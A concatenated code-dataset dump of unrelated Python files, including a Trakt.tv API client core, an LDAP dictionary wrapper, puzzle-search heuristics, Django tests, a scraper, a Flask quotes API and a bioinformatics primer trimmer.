client_id, client_secret\n if client_id is None and client_secret is None:\n CLIENT_ID, CLIENT_SECRET = _get_client_info(app_id=True)\n\n if pin is None and APPLICATION_ID is None:\n print('You must set the APPLICATION_ID of the Trakt application you '\n 'wish to use. 
You can find this ID by visiting the following '\n 'URL.')\n print('https://trakt.tv/oauth/applications')\n sys.exit(1)\n if pin is None:\n print('If you do not have a Trakt.tv PIN, please visit the following '\n 'url and log in to generate one.')\n pin_url = 'https://trakt.tv/pin/{id}'.format(id=APPLICATION_ID)\n print(pin_url)\n pin = six.moves.input('Please enter your PIN: ')\n args = {'code': pin,\n 'redirect_uri': REDIRECT_URI,\n 'grant_type': 'authorization_code',\n 'client_id': CLIENT_ID,\n 'client_secret': CLIENT_SECRET}\n\n response = requests.post(''.join([BASE_URL, '/oauth/token']), data=args)\n OAUTH_TOKEN = response.json().get('access_token', None)\n\n if store:\n _store(CLIENT_ID=CLIENT_ID, CLIENT_SECRET=CLIENT_SECRET,\n OAUTH_TOKEN=OAUTH_TOKEN, APPLICATION_ID=APPLICATION_ID)\n return OAUTH_TOKEN\n\n\ndef oauth_auth(username, client_id=None, client_secret=None, store=False):\n \"\"\"Generate an access_token to allow your application to authenticate via\n OAuth\n\n :param username: Your trakt.tv username\n :param client_id: Your Trakt OAuth Application's Client ID\n :param client_secret: Your Trakt OAuth Application's Client Secret\n :param store: Boolean flag used to determine if your trakt api auth data\n should be stored locally on the system. Default is :const:`False` for\n the security conscious\n :return: Your OAuth access token\n \"\"\"\n global CLIENT_ID, CLIENT_SECRET, OAUTH_TOKEN\n if client_id is None and client_secret is None:\n client_id, client_secret = _get_client_info()\n CLIENT_ID, CLIENT_SECRET = client_id, client_secret\n HEADERS['trakt-api-key'] = CLIENT_ID\n\n authorization_base_url = ''.join([BASE_URL, '/oauth/authorize'])\n token_url = ''.join([BASE_URL, '/oauth/token'])\n\n # OAuth endpoints given in the API documentation\n oauth = OAuth2Session(CLIENT_ID, redirect_uri=REDIRECT_URI, state=None)\n\n # Redirect user to Trakt for authorization\n authorization_url, _ = oauth.authorization_url(authorization_base_url,\n username=username)\n print('Please go here and authorize,', authorization_url)\n\n # Get the authorization verifier code from the callback url\n response = six.moves.input('Paste the Code returned here: ')\n # Fetch, assign, and return the access token\n oauth.fetch_token(token_url, client_secret=CLIENT_SECRET, code=response)\n OAUTH_TOKEN = oauth.token['access_token']\n\n if store:\n _store(CLIENT_ID=CLIENT_ID, CLIENT_SECRET=CLIENT_SECRET,\n OAUTH_TOKEN=OAUTH_TOKEN)\n return oauth.token['access_token']\n\n\ndef init(*args, **kwargs):\n \"\"\"Run the auth function specified by *AUTH_METHOD*\"\"\"\n if AUTH_METHOD == PIN_AUTH:\n return pin_auth(*args, **kwargs)\n else:\n return oauth_auth(*args, **kwargs)\n\n\nAirs = namedtuple('Airs', ['day', 'time', 'timezone'])\nAlias = namedtuple('Alias', ['title', 'country'])\nGenre = namedtuple('Genre', ['name', 'slug'])\nComment = namedtuple('Comment', ['id', 'parent_id', 'created_at', 'comment',\n 'spoiler', 'review', 'replies', 'user',\n 'user_rating'])\n\n\ndef _bootstrapped(f):\n \"\"\"Bootstrap your authentication environment when authentication is needed\n and if a file at `CONFIG_PATH` exists. 
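Only credentials that are still unset in\n    memory are read from that file. 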
The process is completed by setting\n    the client id header.\n    \"\"\"\n    @wraps(f)\n    def inner(*args, **kwargs):\n        global CLIENT_ID, CLIENT_SECRET, OAUTH_TOKEN\n        if (CLIENT_ID is None or CLIENT_SECRET is None) and \\\n                os.path.exists(CONFIG_PATH):\n            # Load in trakt API auth data from CONFIG_PATH\n            with open(CONFIG_PATH) as config_file:\n                config_data = json.load(config_file)\n\n            if CLIENT_ID is None:\n                CLIENT_ID = config_data.get('CLIENT_ID', None)\n            if CLIENT_SECRET is None:\n                CLIENT_SECRET = config_data.get('CLIENT_SECRET', None)\n            if OAUTH_TOKEN is None:\n                OAUTH_TOKEN = config_data['OAUTH_TOKEN']\n\n        # For backwards compatibility with trakt<=2.3.0\n        if api_key is not None and OAUTH_TOKEN is None:\n            OAUTH_TOKEN = api_key\n        return f(*args, **kwargs)\n    return inner\n\n\nclass Core(object):\n    \"\"\"This class contains all of the functionality required for interfacing\n    with the Trakt.tv API\n    \"\"\"\n\n    def __init__(self):\n        \"\"\"Create a :class:`Core` instance and give it a logger attribute\"\"\"\n        self.logger = logging.getLogger('trakt.core')\n\n        # Get all of our exceptions except the base exception\n        errs = [getattr(errors, att) for att in errors.__all__\n                if att != 'TraktException']\n\n        # Map HTTP response codes to exception types\n        self.error_map = {err.http_code: err for err in errs}\n\n    @staticmethod\n    def _get_first(f, *args, **kwargs):\n        \"\"\"Extract the first value from the provided generator function *f*\n\n        :param f: A generator function to extract data from\n        :param args: Non keyword args for the generator function\n        :param kwargs: Keyword args for the generator function\n        :return: The full url for the resource, a generator, and either a data\n            payload or `None`\n        \"\"\"\n        generator = f(*args, **kwargs)\n        uri = next(generator)\n        if not isinstance(uri, (str, tuple)):\n            # Allow properties to safely yield arbitrary data\n            return uri\n        if isinstance(uri, tuple):\n            uri, data = uri\n            return BASE_URL + uri, generator, data\n        else:\n            return BASE_URL + uri, generator, None\n\n    def _handle_request(self, method, url, data=None):\n        \"\"\"Handle actually talking out to the trakt API, logging out debug\n        information, raising any relevant `TraktException` Exception types,\n        and extracting and returning JSON data\n\n        :param method: The HTTP method we're executing on. Will be one of\n            post, put, delete, get\n        :param url: The fully qualified url to send our request to\n        :param data: Optional data payload to send to the API\n        :return: The decoded JSON response from the Trakt API\n        :raises TraktException: If any non-200 return code is encountered\n        \"\"\"\n        self.logger.debug('%s: %s', method, url)\n        HEADERS['trakt-api-key'] = CLIENT_ID\n        HEADERS['Authorization'] = 'Bearer {0}'.format(OAUTH_TOKEN)\n        self.logger.debug('headers: %s', str(HEADERS))\n        self.logger.debug('method, url :: %s, %s', method, url)\n        if method == 'get':  # GETs need to pass data as params, not body\n            response = requests.request(method, url, params=data,\n                                        headers=HEADERS)\n        else:\n            response = requests.request(method, url, data=json.dumps(data),\n                                        headers=HEADERS)\n        self.logger.debug('RESPONSE [%s] (%s): %s', method, url, str(response))\n        if response.status_code in self.error_map:\n            raise self.error_map[response.status_code]()\n        elif response.status_code == 204:  # HTTP no content\n            return None\n        json_data = json.loads(response.content.decode('UTF-8', 'ignore'))\n        return json_data\n\n    @_bootstrapped\n    def get(self, f):\n        \"\"\"Perform a HTTP GET request using the provided uri yielded from the\n        *f* co-routine. 
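If *f* yields a non-uri value, such as a cached\n        property, that value is returned as-is. 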
The processed JSON results are then sent back to the\n co-routine for post-processing, the results of which are then returned\n\n :param f: Generator co-routine that yields uri, args, and processed\n results\n :return: The results of the generator co-routine\n \"\"\"\n @wraps(f)\n def inner(*args, **kwargs):\n resp = self._get_first(f, *args, **kwargs)\n if not isinstance(resp, tuple):\n # Handle cached property responses\n return resp\n url, generator, _ = resp\n json_data = self._handle_request('get', url)\n try:\n return generator.send(json_data)\n except StopIteration:\n return None\n return inner\n\n @_bootstrapped\n def delete(self, f):\n \"\"\"Perform an HTTP DELETE request using the provided uri\n\n :param f: Function that returns a uri to delete to\n \"\"\"\n @wraps(f)\n def inner(*args, **kwargs):\n generator = f(*args, **kwargs)\n uri = next(generator)\n url = BASE_URL + uri\n self._handle_request('delete', url)\n return inner\n\n @_bootstrapped\n def post(self, f):\n \"\"\"Perform an HTTP POST request using the provided uri and optional\n args yielded from the *f* co-routine. The processed JSON results are\n then sent back to the co-routine for post-processing, the results of\n which are then returned\n\n :param f: Generator co-routine that yields uri, args, and processed\n results\n :return: The results of the generator co-routine\n \"\"\"\n @wraps(f)\n def inner(*args, **kwargs):\n url, generator, args = self._get_first(f, *args, **kwargs)\n json_data = self._handle_request('post', url, data=args)\n try:\n return generator.send(json_data)\n except StopIteration:\n return None\n return inner\n\n @_bootstrapped\n def put(self, f):\n \"\"\"Perform an HTTP PUT request using the provided uri and optional args\n yielded from the *f* co-routine. 
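The optional payload yielded with the uri is\n        serialized to JSON and sent as the request body. 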
The processed JSON results are then\n sent back to the co-routine for post-processing, the results of which\n are then returned\n\n :param f: Generator co-routine that yields uri, args, and processed\n results\n :return: The results of the generator co-routine\n \"\"\"\n @wraps(f)\n def inner(*args, **kwargs):\n url, generator, args = self._get_first(f, *args, **kwargs)\n json_data = self._handle_request('put', url, data=args)\n try:\n return generator.send(json_data)\n except StopIteration:\n return None\n return inner\n\n# Here we can simplify the code in each module by exporting these instance\n# method decorators as if they were simple functions.\nCORE = Core()\nget = CORE.get\npost = CORE.post\ndelete = CORE.delete\nput = CORE.put\n","repo_name":"wellspokenman/tag-generator","sub_path":"resources/lib/trakt/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":14240,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"34"} +{"seq_id":"38503931755","text":"from ldap3 import ALL_ATTRIBUTES\nfrom ldap3.core.connection import Connection\n\n\nclass LDAPDBWrap(object):\n \"\"\" Wrapper to make an LDAP database look like a dict.\n Returns all info about a user as a dictionary.\n \"\"\"\n\n def __init__(self, uri=\"localhost\", base=\"dc=localhost\", filter_pattern=\"uid={}\"):\n self.uri = uri\n self.base = base\n self.filter_pattern = filter_pattern\n\n def __getitem__(self, user):\n with Connection(self.uri, auto_bind=True) as conn:\n conn.search(self.base, '({})'.format(self.filter_pattern.format(user)),\n attributes=ALL_ATTRIBUTES)\n\n entry = conn.entries[0]\n return entry.entry_get_attributes_dict()\n","repo_name":"rohe/pyuma","sub_path":"src/uma/dbwrap/ldap_wrap.py","file_name":"ldap_wrap.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"34814994795","text":"#Counts how many vehicles are in the way of the ambulance\ndef check_heuristic1(state, multiplier=1):\n list_vehicles = []\n i = 5\n while i >= 0:\n if state.board[2][i] == \"A\":\n break\n if state.board[2][i] != \".\" and state.board[2][i] not in list_vehicles:\n list_vehicles.append(state.board[2][i])\n i -= 1\n\n return len(list_vehicles)\n\n\n#Counts how many positions are taken by cars other than ambulance\ndef check_heuristic2(state, multiplier=1):\n count = 0\n i = 5\n while i >= 0:\n if state.board[2][i] == \"A\":\n break\n if state.board[2][i] != \".\":\n count += 1\n i -= 1\n return count\n\n\ndef check_heuristic3(state, multiplier=1):\n return check_heuristic1(state) * multiplier\n\n#Temporary implementation of\n\"\"\"\nProposed: Count all the cars in between the ambulance and the exit, and add 1 if the cars' orientation is not homogeneous.\n\"\"\"\ndef check_heuristic4(state, multiplier=1):\n list_vehicles =[]\n i = 5\n while i >= 0:\n if state.board[2][i] == \"A\":\n break\n if state.board[2][i] != \".\" and state.board[2][i] not in list_vehicles:\n list_vehicles.append(state.board[2][i])\n i -= 1\n\n #Checks if the cars have different\n has_both_hor_vert=0\n if len(list_vehicles) > 0:\n is_horizontal = state.cars[list_vehicles[0]].horizontal\n for i in range(1,len(list_vehicles)):\n if state.cars[list_vehicles[i]].horizontal != is_horizontal:\n has_both_hor_vert = 1\n break\n return len(list_vehicles) + has_both_hor_vert\n\ndef heuristic_name_from_heuristic(heuristic):\n if heuristic == check_heuristic1:\n return \"h1\"\n elif heuristic == check_heuristic2:\n 
return \"h2\"\n elif heuristic == check_heuristic3:\n return \"h3\"\n elif heuristic == check_heuristic4:\n return \"h4\"\n return None\n\n","repo_name":"adrientremblay/comp472-mp2","sub_path":"heuristics.py","file_name":"heuristics.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6478182490","text":"from django.http import QueryDict\nfrom django.test import tag\nfrom resources.generators.ParityCardsResourceGenerator import ParityCardsResourceGenerator\nfrom tests.resources.generators.utils import BaseGeneratorTest\n\n\n@tag(\"resource\")\nclass ParityCardsResourceGeneratorTest(BaseGeneratorTest):\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.language = \"en\"\n self.base_valid_query = QueryDict(\"back_colour=black&paper_size=a4\")\n\n def test_back_colour_values(self):\n generator = ParityCardsResourceGenerator(self.base_valid_query)\n self.run_parameter_smoke_tests(generator, \"back_colour\")\n\n def test_subtitle_black_a4(self):\n query = QueryDict(\"back_colour=black&paper_size=a4\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Black - a4\"\n )\n\n def test_subtitle_black_letter(self):\n query = QueryDict(\"back_colour=black&paper_size=letter\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Black - letter\"\n )\n\n def test_subtitle_blue_a4(self):\n query = QueryDict(\"back_colour=blue&paper_size=a4\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Blue - a4\"\n )\n\n def test_subtitle_blue_letter(self):\n query = QueryDict(\"back_colour=blue&paper_size=letter\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Blue - letter\"\n )\n\n def test_subtitle_green_a4(self):\n query = QueryDict(\"back_colour=green&paper_size=a4\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Green - a4\"\n )\n\n def test_subtitle_green_letter(self):\n query = QueryDict(\"back_colour=green&paper_size=letter\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Green - letter\"\n )\n\n def test_subtitle_purple_a4(self):\n query = QueryDict(\"back_colour=purple&paper_size=a4\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Purple - a4\"\n )\n\n def test_subtitle_purple_letter(self):\n query = QueryDict(\"back_colour=purple&paper_size=letter\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Purple - letter\"\n )\n\n def test_subtitle_red_a4(self):\n query = QueryDict(\"back_colour=red&paper_size=a4\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Red - a4\"\n )\n\n def test_subtitle_red_letter(self):\n query = QueryDict(\"back_colour=red&paper_size=letter\")\n generator = ParityCardsResourceGenerator(query)\n self.assertEqual(\n generator.subtitle,\n \"Red - letter\"\n )\n","repo_name":"uccser/cs-unplugged","sub_path":"csunplugged/tests/resources/generators/test_parity_cards.py","file_name":"test_parity_cards.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":189,"dataset":"github-code","pt":"34"} +{"seq_id":"35019668955","text":"'''\n Kiana Hosaka\n CIS 314 Winter 19\n'''\n\nfrom 
sys import argv\nfrom RBT import RedBlackTree\n\ndef main(argv):\n    fileName = argv[1]\n    T = RedBlackTree()\n    with open(fileName, 'r') as fob:\n        for line in fob:\n            l = line.strip().split()\n            if len(l) == 2:\n                command = l[0]\n                data = int(l[1].strip())\n                if command == 'insert':\n                    T.insert(data)\n\n\n                if command == 'delete':\n                    T.delete(data)\n\n                # If command is search...\n                if command == 'search':\n                    # If data exists, print the data\n                    if T.search(data):\n                        print(str(data) + ' Found')\n\n            if len(l) == 1:\n                print(l[0])\n                T.traverse(l[0])\n                print('')\n\n    # for i in range(1, 11):\n    #     T.insert(i)\n    #     T.traverse(\"pre-order\")\n    #     print\n    #\n    # for i in range(1, 11):\n    #     T.delete(T.root.key)\n    #     T.traverse(\"pre-order\")\n    #     print\n    #\n\n\n\nif __name__ == \"__main__\":\n    main(argv)\n","repo_name":"kahosaka/coursework","sub_path":"dataStructures/redBlackTree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6483957920","text":"import requests\nimport logging\nfrom os import mkdir\nfrom os.path import exists\nimport json\n\nTOTAL_PAGE = 2\nLIMIT = 10\nINDEX_URL = \"https://dynamic1.scrape.cuiqingcai.com/api/movie/?limit={limit}&offset={offset}\"\nDETAIL_URL = 'https://dynamic1.scrape.cuiqingcai.com/api/movie/{id}'\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s-%(levelname)s:%(message)s')\n\n\ndef scrape_index(page):\n    index_url = INDEX_URL.format(limit=LIMIT, offset=(page-1)*LIMIT)\n    return scrape_api(index_url)\n\n\ndef scrape_detail(id):\n    detail_url = DETAIL_URL.format(id=id)\n    return scrape_api(detail_url)\n\n\ndef scrape_api(url):\n    logging.info('scraping %s...', url)\n    try:\n        res = requests.get(url)\n        if res.status_code == 200:\n            return res.json()\n        logging.error('got invalid status code %s while scraping %s', res.status_code, url)\n    except requests.RequestException:\n        logging.error('error occurred while scraping %s', url, exc_info=True)\n\n\nRESULTS_DIR = 'results2'\nexists(RESULTS_DIR) or mkdir(RESULTS_DIR)\n\n\ndef save_json(data):\n    name = data.get('name')\n    json_path = f'{RESULTS_DIR}/{name}.json'\n    json.dump(data, open(json_path, 'w', encoding='utf-8'), ensure_ascii=False, indent=2)\n\n\ndef main():\n    for page in range(1, TOTAL_PAGE+1):\n        res_index = scrape_index(page)\n        for item in res_index.get('results'):\n            id = item.get(\"id\")\n            res_detail = scrape_detail(id)\n            logging.info('detail data %s', res_detail)\n            save_json(res_detail)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"fox2moon/52crawler","sub_path":"第13讲:Ajax 爬取案例实战/getMovieByAjax_2.py","file_name":"getMovieByAjax_2.py","file_ext":"py","file_size_in_byte":1574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"43174000449","text":"\"\"\"\nBubble Sort is the simplest sorting algorithm that works by repeatedly swapping\nthe adjacent elements if they are in the wrong order. This algorithm is not 
This algorithm is not \nsuitable for large data sets as its average and worst-case time complexity \nis quite high\n\n\n{\n\n When to use Bubble Sort?\n - When the input is already sorted\n - Space is a concern\n - Easy to implement\nWhen to avoid Bubble Sort?\n - Average time complexity is poor\n}\n\n\"\"\"\n\n\ndef BubbleSortAlgo(customLIst):\n \"\"\"\n Time complexity ---O(N^2)\n Space complexity --O(1)\n \"\"\"\n for i in range(len(customLIst)-1):#O(n)\n for j in range(len(customLIst)-i-1):#O(n)\n if customLIst[j]>customLIst[j+1]:\n customLIst[j],customLIst[j+1]=customLIst[j+1],customLIst[j]\n return customLIst\n\nunsortlist=[4,3,2,6,8,3,22,5,6]\nx=BubbleSortAlgo(unsortlist)\nprint(x)\n","repo_name":"RahulGupta237/Data-Structure-And-Algorithm-in-Python","sub_path":"sorting/BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74051486178","text":"from flask import Flask, request\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///quotes.db'\ndb=SQLAlchemy(app)\n\nclass Quotes(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n author = db.Column(db.String(80))\n text = db.Column(db.String(150))\n\n def __repr__(self):\n return f\"{self.text} - {self.author}\"\n\n@app.route('/')\ndef index():\n return f'Try /quotes , /quotes/(id)'\n\n@app.route('/quotes')\ndef get_quotes():\n quotes = Quotes.query.all()\n\n output = []\n for q in quotes:\n quotes_data= {'Author': q.author,'Quote:':q.text}\n output.append(quotes_data)\n return {\"quotes\":output}\n\n@app.route('/quotes/')\ndef get_quote(id):\n quote = Quotes.query.get_or_404(id)\n return {'Author':quote.author, \"Quote\": quote.text}\n\n@app.route('/quotes', methods=['POST'])\ndef add_quote():\n q = Quotes(author=request.json['author'], text=request.json['text'])\n db.session.add(q)\n db.session.commit()\n return f\"Succesfully added!\"\n\n@app.route('/quotes/', methods=['DELETE'])\ndef delete_quote(id):\n q=Quotes.query.get(id)\n if q is None:\n return {\"error\":\"not found\"}\n db.session.delete(q)\n db.session.commit()\n return {\"message\": f\"This quote:'{q.text}', was Deleted\"}\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Yazan-AbuAwad/quotes-api","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71297907617","text":"\"\"\"\n'S'=晴\n'C'=曇\n'R'=雨\n3日間で天気予報が的中した日が何日あるかを出力せよ。\n\n入力\nCSS\nCSR\n\n出力\n2\n\"\"\"\n\n#S= ['C', 'S', 'S']\n#T= ['C', 'S', 'R']\n\nS= input()\nT= input()\n\nS_list = []\nT_list = []\ndef split_lint(text, list):\n words=text.split()\n for word in words:\n list.append(word)\nsplit_lint(S, S_list)\nsplit_lint(T, T_list)\n\ncount=0\nfor i in range(3):\n if S_list[i] == T_list[i]:\n count += 1\nprint(count)","repo_name":"KFurudate/Atcoder_SHOJIN","sub_path":"Atcoder/20190901_AtCoder_Beginner_Contest_139/Tenki.py","file_name":"Tenki.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8224995774","text":"# 119. 
Pascal's Triangle II\n# Easy\n\n# Given an integer rowIndex, return the rowIndexth row of the Pascal's triangle.\n\nclass Solution(object):\n def getRow(self, rowIndex):\n \"\"\"\n :type rowIndex: int\n :rtype: List[int]\n \"\"\"\n dp = [1]*(rowIndex + 1)\n\n for row in range(rowIndex+1):\n dp[row] = [1] * (row+1)\n\n for row in range(2, rowIndex + 1):\n for k in range(1, row):\n dp[row][k] = dp[row-1][k] + dp[row-1][k-1]\n\n return dp[rowIndex]\n","repo_name":"atolat/algorithms-lc","sub_path":"DP/Counting/pascal-ii.py","file_name":"pascal-ii.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36762433826","text":"#!/usr/bin/python3\n\n# ## {R2D2919B742E} ##\n# ###########################################################################\n# What if magic existed?\n# What if a place existed where your every thought and dream come to life.\n# There is only one catch: it has to be written down.\n# Such a place exists, it is called programming.\n# - Scott Taylor Reph, RightThumb.com\n# ###########################################################################\n# ## {C3P0D40fAe8B} ##\n\n# import os\nimport sys\nimport time\n# import simplejson as json\n# from threading import Timer\n\n\n##################################################\n# construct registration\n\nimport _rightThumb._construct as __\nappDBA = __.clearFocus( __name__, __file__ )\n# appDBA = __name__\n__.appReg = appDBA\ndef focus( parentApp='', childApp='', reg=True ):\n\tglobal appDBA\n\tf = __.appName( appDBA, parentApp, childApp )\n\tif reg:\n\t\t__.appReg = f\n\treturn f\n__.registeredApps.append(focus())\nimport _rightThumb._base3 as _\n_.load()\n\n##################################################\n\nimport _rightThumb._vars as _v\nimport _rightThumb._string as _str\n# import _rightThumb._date as _date\n# import _rightThumb._dir as _dir\n# import _rightThumb._md5 as _md5\n# import _rightThumb._mimetype as _mime\n\n# import _rightThumb._auditCodeBase as _code\n# _code = _.regImp( focus(), '_rightThumb._auditCodeBase' )\n\n##################################################\n\n# from lxml import html\n# import requests\n# import cssselect\n# import sqlite3\n\n##################################################\n\n\ndef appSwitches():\n\t_.switches.register('Invert', '-i')\n\t_.switches.register('Delim', '-del')\n\t_.switches.register('Prefix', '-pre')\n\t\n\n\n\n_.appInfo[focus()] = {\n\t'file': 'thisApp.py',\n\t'description': 'Changes the world',\n\t'categories': [\n\t\t\t\t\t\t'research',\n\t\t\t\t\t\t'text manipulation',\n\t\t\t\t],\n\t'relatedapps': [],\n\t'prerequisite': [],\n\t'examples': [],\n\t'columns': [],\n\t}\n\n_.appData[focus()] = {\n\t'start': time.time(),\n\t'uuid': '',\n\t'audit': [],\n\t'pipe': [],\n\t}\n\n_.appInfo[focus()]['examples'].append('p thisApp -file file.txt')\n\n# _.appInfo[focus()]['columns'].append({'name': 'name', 'abbreviation': 'n'})\n\n\n\n\n\ndef registerSwitches( argvProcessForce=False ):\n\tglobal appDBA\n\tif not __.appReg == appDBA and appDBA in __.appReg:\n\n\t\tif not __name__ == '__main__':\n\t\t\t_.argvProcess = argvProcessForce\n\t\telse:\n\t\t\t_.argvProcess = True\n\n\t\t_.load()\n\t\t_.appInfo[__.appReg] = _.appInfo[appDBA]\n\t\t_.appData[__.appReg] = _.appData[appDBA]\n\t__.constructRegistration(_.appInfo[__.appReg]['file'],__.appReg)\n\tappSwitches()\n\t_.defaultScriptTriggers()\n\t# _.switches.trigger('Watched', _.txt2Date)\n\t# 
_.switches.trigger('Input',_.formatColumns)\n\t_.switches.process()\n\n\n\nif not __name__ == '__main__':\n\t_.argvProcess = False\nelse:\n\t_.argvProcess = True\n\nregisterSwitches()\n\n\n\n\n\ndef fieldSet( switchName, switchField, switchValue, theFocus=False ):\n\tif not type( theFocus ) == bool:\n\t\ttheFocus = theFocus\n\t_.switches.fieldSet( switchName, switchField, switchValue, theFocus )\n\ndef setPipeData(data):\n\t# _.appData[__.appReg]['pipe'] = list(data)\n\tif len(data) > 0:\n\t\t_.appData[__.appReg]['pipe'] = []\n\t\tfor pd in data:\n\t\t\tpd = pd.replace('\\n','')\n\t\t\tif not pd == '':\n\t\t\t\t_.appData[__.appReg]['pipe'].append(pd)\n\ndef pipeCleaner():\n\tif len( _.appData[__.appReg]['pipe'] ):\n\t\tif type( _.appData[__.appReg]['pipe'][0] ) == str:\n\t\t\tif not _.appData[__.appReg]['pipe'][0][0] in _str.safeChar:\n\t\t\t\t_.appData[__.appReg]['pipe'][0] = _.appData[__.appReg]['pipe'][0][1:]\n\t\t\tfor i,pipeData in enumerate(_.appData[__.appReg]['pipe']):\n\t\t\t\t_.appData[__.appReg]['pipe'][i] = _.appData[__.appReg]['pipe'][i].replace('\\n','')\n\n\n\n\n_.appData[__.appReg]['pipe'] = False\nif not sys.stdin.isatty():\n\tsetPipeData( sys.stdin.readlines() )\n\t# _.appData[__.appReg]['pipe'] = sys.stdin.readlines()\n\t# pipeCleaner()\n\n\n\n########################################################################################\n\n########################################################################################\n########################################################################################\n# START\n\n\n\ndef action():\n\t\n\tif not type( _.appData[__.appReg]['pipe'] ) == bool:\n\n\t\tdone = []\n\n\t\tinv = list(_.appData[__.appReg]['pipe'])\n\t\tinv.reverse()\n\t\tif _.switches.isActive('Invert'):\n\t\t\t_.appData[__.appReg]['pipe'].reverse()\n\t\t\tinv.reverse()\n\n\t\t_.pr( 'bc:', __.appReg )\n\n\t\tfor data0 in _.appData[__.appReg]['pipe']:\n\n\t\t\tfor data1 in inv:\n\t\t\t\tdone.append( data0+','+data0 )\n\t\t\t\tdone.append( data1+','+data1 )\n\t\t\t\tif not data0+','+data1 in done and not data1+','+data0 in done:\n\t\t\t\t\tdone.append( data0+','+data1 )\n\t\t\t\t\tnewData = data0+','+data1\n\t\t\t\t\tif _.switches.isActive('Delim'):\n\t\t\t\t\t\tnewData = newData.replace( ',', _.switches.value('Delim') )\n\t\t\t\t\tif _.switches.isActive('Prefix'):\n\t\t\t\t\t\tnewData = _.switches.value('Prefix') + ' ' + newData\n\t\t\t\t\t_.pr( newData )\n\n\n\n\n########################################################################################\nif __name__ == '__main__':\n\taction()\n\n\n\n\n\n\n","repo_name":"rightthumb/rightthumb-widgets-v0","sub_path":"widgets/python/buildCombos.py","file_name":"buildCombos.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"42397556124","text":"import pandas\nimport os\nimport random\nimport argparse\nimport re\nfrom FastqStreamer.FastqReader import FastqReader\nfrom BamStreamer.BamPairs import read_two_bams\nfrom trimPrimers.utils import *\n\nclass IPetePrimerTrimmer(FastqReader):\n \"\"\"\n Parse primer alignments from reads, trim primers from ends\n \"\"\"\n\n def __init__(self, primer_info, expected_v_start):\n \"\"\"\n Parameters\n ----------\n reference_annot_file : Str\n reference annotation format for primer sequences\n\n \"\"\"\n FastqReader.__init__(self)\n self.expected_v_start = expected_v_start\n self.reference = import_primer_reference(primer_info)\n \n def get_aln_stats(self, read, whichGene):\n 
\"\"\"\n get alignment information about a read\n\n Parameters\n ----------\n read : dict\n read record returned by FastqReader\n\n whichGene : Str\n which read \"read1\" or \"read2\"\n\n Returns\n -------\n stats : Str\n A string containing alignment information\n \"\"\"\n \n stats = \"{name}\\t{start}\\t{end}\\t{qStart}\\t{qEnd}\\t{score}\\t{cigar}\\t{mismatch}\\t{insertion}\\t{deletion}\\t{percentId}\\t{alnType}\\t{primerLen}\"\n if read[whichGene] is not None:\n refName = read[whichGene][\"reference_name\"]\n return stats.format(name=read[whichGene][\"reference_name\"].split(\"__\")[0],\n start=read[whichGene][\"start\"],\n end=read[whichGene][\"end\"],\n qStart=read[whichGene][\"query_start\"],\n qEnd=read[whichGene][\"query_end\"],\n score=read[whichGene][\"score\"],\n cigar=read[whichGene][\"cigar\"],\n mismatch=read[whichGene][\"mismatches\"],\n insertion=read[whichGene][\"insertions\"],\n deletion=read[whichGene][\"deletions\"],\n percentId=read[whichGene][\"percent_identity\"],\n alnType=read[whichGene][\"classification\"],\n primerLen=len(self.reference[refName][\"seq\"]))\n else:\n return stats.format(name=\"\",\n start=\"\",\n end=\"\",\n qStart=\"\",\n qEnd=\"\",\n score=\"\",\n cigar=\"\",\n mismatch=\"\",\n insertion=\"\",\n deletion=\"\",\n percentId=\"\",\n alnType=\"\",\n primerLen=\"\")\n\n def write_aln_stats(self, read, filename):\n \"\"\"\n write alignment information to file, combining V and J gene alignments\n\n Parameters\n ----------\n read : dict\n read record returned by FastqReader\n\n filename: Str\n The name of the stats file to be written\n\n Returns\n -------\n None\n \"\"\"\n fh = self.file_handles_[filename]\n stats = 